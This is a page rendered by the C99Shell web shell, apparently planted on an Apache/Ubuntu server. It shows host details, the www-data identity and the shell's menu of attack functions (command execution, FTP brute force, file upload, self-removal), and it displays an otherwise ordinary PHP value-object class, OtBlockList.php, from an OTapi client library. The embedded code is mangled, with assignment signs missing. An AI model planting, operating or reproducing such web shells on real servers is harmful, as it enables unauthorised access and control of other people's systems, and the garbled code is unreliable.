!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/OTapi/otapiphpclient-master/src/ValuesObject/   drwxr-xr-x
Free 13.15 GB of 57.97 GB (22.69%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     OtBlockList.php (2.84 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace OtApiClient\ValuesObject;

/**
 * Class OtBlockList
 * @package OtapiClient\ValuesObject
 */
class OtBlockList
{
    
/*** @var bool */
    
private bool $SubCategories FALSE;
    
/*** @var bool */
    
private bool $SearchProperties FALSE;
    
/*** @var bool */
    
private bool $RootPath FALSE;
    
/*** @var bool */
    
private bool $Vendor FALSE;
    
/*** @var bool */
    
private bool $Brand FALSE;
    
/*** @var bool */
    
private bool $Category FALSE;
    
/*** @var bool */
    
private bool $HintCategories FALSE;
    
/*** @var bool */
    
private bool $AvailableSearchMethods FALSE;

    
/*** @param bool $SubCategories */
    
public function setSubCategories(bool $SubCategories): void
    
{
        
$this->SubCategories $SubCategories;
    }

    
/*** @param bool $SearchProperties */
    
public function setSearchProperties(bool $SearchProperties): void
    
{
        
$this->SearchProperties $SearchProperties;
    }

    
/*** @param bool $RootPath */
    
public function setRootPath(bool $RootPath): void
    
{
        
$this->RootPath $RootPath;
    }

    
/*** @param bool $Vendor */
    
public function setVendor(bool $Vendor): void
    
{
        
$this->Vendor $Vendor;
    }

    
/*** @param bool $Brand */
    
public function setBrand(bool $Brand): void
    
{
        
$this->Brand $Brand;
    }

    
/*** @param bool $Category */
    
public function setCategory(bool $Category): void
    
{
        
$this->Category $Category;
    }

    
/*** @param bool $HintCategories */
    
public function setHintCategories(bool $HintCategories): void
    
{
        
$this->HintCategories $HintCategories;
    }

    
/*** @param bool $AvailableSearchMethods */
    
public function setAvailableSearchMethods(bool $AvailableSearchMethods): void
    
{
        
$this->AvailableSearchMethods $AvailableSearchMethods;
    }

    
/*** @return bool */
    
public function isSubCategories(): bool
    
{
        return 
$this->SubCategories;
    }

    
/*** @return bool */
    
public function isSearchProperties(): bool
    
{
        return 
$this->SearchProperties;
    }

    
/*** @return bool */
    
public function isRootPath(): bool
    
{
        return 
$this->RootPath;
    }

    
/*** @return bool */
    
public function isVendor(): bool
    
{
        return 
$this->Vendor;
    }

    
/*** @return bool */
    
public function isBrand(): bool
    
{
        return 
$this->Brand;
    }

    
/*** @return bool */
    
public function isCategory(): bool
    
{
        return 
$this->Category;
    }

    
/*** @return bool */
    
public function isHintCategories(): bool
    
{
        return 
$this->HintCategories;
    }

    
/*** @return bool */
    
public function isAvailableSearchMethods(): bool
    
{
        return 
$this->AvailableSearchMethods;
    }

    
/*** @return string */
    
public function getData(): string
    
{
        
$props      get_object_vars($this);
        
$parameters = [];
        foreach (
$props as $propName => $propValue) {
            if (
$propValue === TRUE) {
                
$parameters[] = $propName;
            }
        }
        return 
count($parameters) ? implode(','$parameters) : '';
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0197 ]--